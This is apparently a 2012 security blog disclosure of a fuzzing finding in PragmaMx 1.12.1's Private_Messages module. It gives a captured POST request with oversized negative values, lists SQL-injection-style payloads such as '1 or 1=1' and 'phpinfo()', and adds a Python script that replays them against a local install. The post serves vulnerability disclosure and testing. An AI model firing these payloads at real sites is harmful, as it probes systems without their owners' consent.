Sunday 18 March 2012

[EN] PragmaMx 1.12.1 - 'bomb' for logged-in users (in Private_Messages)

In the latest PragmaMx I found some interesting behaviour, described below:

# TITLE ....... # PragmaMx 1.12.1 - 'bomb' for logged-in users (in Private_Messages) ........ #
# DATE ........ # 18.03.2012 ................................................................................... #
# AUTHOR ...... # http://hauntit.blogspot.com .................................................................. #
# SOFT LINK ... # http://www.pragmamx.org ...................................................................... #
# VERSION ..... # 1.12.1 ....................................................................................... #
# TESTED ON ... # LAMP ......................................................................................... #
# .............................................................................................................. #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
While fuzzing this application I found a very interesting thing.
Look at the traffic captured in Burp, in section (3).

#............................................#
# 3. Where is bug :)

...cut from Burp...
POST /www/lastz/pragmamx.1.12.1/html/modules.php?name=Private_Messages HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Referer: http://localhost/www/lastz/pragmamx.1.12.1/html/modules.php?name=Private_Messages&file=buddy&op=compose&to=tester
Cookie: mxlalala=lalala; tab_ya_edituser=1; PHPSESSID=PHPSESSID
Content-Type: application/x-www-form-urlencoded
Content-Length: 177
Connection: close

subject=aaaaa&message=aaaaaaaaaaaaaaaaa&name=Private_Messages&file=buddy&to_userid=-999999999999999&op=-999999999999999&to=-999999999999999&x=-999999999999999&y=-999999999999999
...cut from Burp...

What I saw at this stage you can check on my blog (4).
Description: after I built this payload (-999...) and sent it to PragmaMx via Burp,
the response status was 200 (OK). So I copied the URL string and sent it to the browser.
The page started to create new windows in messages (from the other fuzzing tests).

'-999...' is not the only payload that triggers this.
You can try many more, like: 23 or 1, 1 or 1=1, phpinfo(), etc.

Try it ;)
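As an added example (not code from the original post and not PragmaMx's own code), here is a small Python harness that rebuilds the POST from the Burp capture above for each of the payloads listed and compares every response against a baseline, so a changed status code or a changed page stands out instead of being eyeballed in Burp. The URL, the form field names and the cookie name come from the capture; the session value, the neutral baseline value and the response-normalization rules are assumptions.

```python
"""Replay the Private_Messages POST from section 3 with several fuzz payloads
and compare each response against a baseline so anomalies stand out."""
import hashlib
import re
import urllib.error
import urllib.parse
import urllib.request

# Endpoint and cookie name taken from the Burp capture; the host is a local
# test install and the session value is a placeholder you must replace.
URL = "http://localhost/www/lastz/pragmamx.1.12.1/html/modules.php?name=Private_Messages"
COOKIE = "PHPSESSID=PHPSESSID"

# The payloads the post lists; the fuzzed parameters are the ones the capture
# filled with -999999999999999.
PAYLOADS = ["-999999999999999", "23 or 1", "1 or 1=1", "phpinfo()"]
FUZZED_FIELDS = ("to_userid", "op", "to", "x", "y")


def build_body(payload, subject="aaaaa", message="a" * 17):
    """Build the urlencoded body with every fuzzed field set to `payload`.
    With the -999... payload this reproduces the 177-byte body from Burp."""
    fields = [("subject", subject), ("message", message),
              ("name", "Private_Messages"), ("file", "buddy")]
    fields += [(name, payload) for name in FUZZED_FIELDS]
    return urllib.parse.urlencode(fields)


def fingerprint(status, body):
    """Reduce a response to (status, length, hash) after masking values that
    change on every request (session ids, clock times), so two renderings of
    the same page compare equal and a genuinely different page does not.
    The masking rules are assumptions; extend them for the target's markup."""
    normalized = re.sub(rb"PHPSESSID=[0-9a-f]+", b"PHPSESSID=X", body)
    normalized = re.sub(rb"\d{1,2}:\d{2}(:\d{2})?", b"HH:MM", normalized)
    return (status, len(normalized), hashlib.sha256(normalized).hexdigest()[:12])


def classify(baseline, candidate):
    """Label a fuzzed response relative to the baseline: 'same', 'status'
    when the HTTP status differs, 'changed' when only the content differs."""
    if candidate == baseline:
        return "same"
    if candidate[0] != baseline[0]:
        return "status"
    return "changed"


def send(body):
    """POST the body with the headers from the capture; return (status, bytes).
    HTTP error responses are returned, not raised, so they get fingerprinted too."""
    req = urllib.request.Request(
        URL, data=body.encode(), method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded",
                 "Cookie": COOKIE, "User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


if __name__ == "__main__":
    # Baseline: a neutral value in the fuzzed fields (assumption; a capture of
    # a legitimate compose submission makes a better baseline if you have one).
    base = fingerprint(*send(build_body("1")))
    for p in PAYLOADS:
        fp = fingerprint(*send(build_body(p)))
        print(f"{p!r:20} status={fp[0]} len={fp[1]:6} -> {classify(base, fp)}")
```

Run it against a test install with a valid PHPSESSID in COOKIE; a response the harness labels 'changed' or 'status' is the one worth opening in the browser, as the post does.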

#............................................#
# 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#............................................#
# Best regards
#


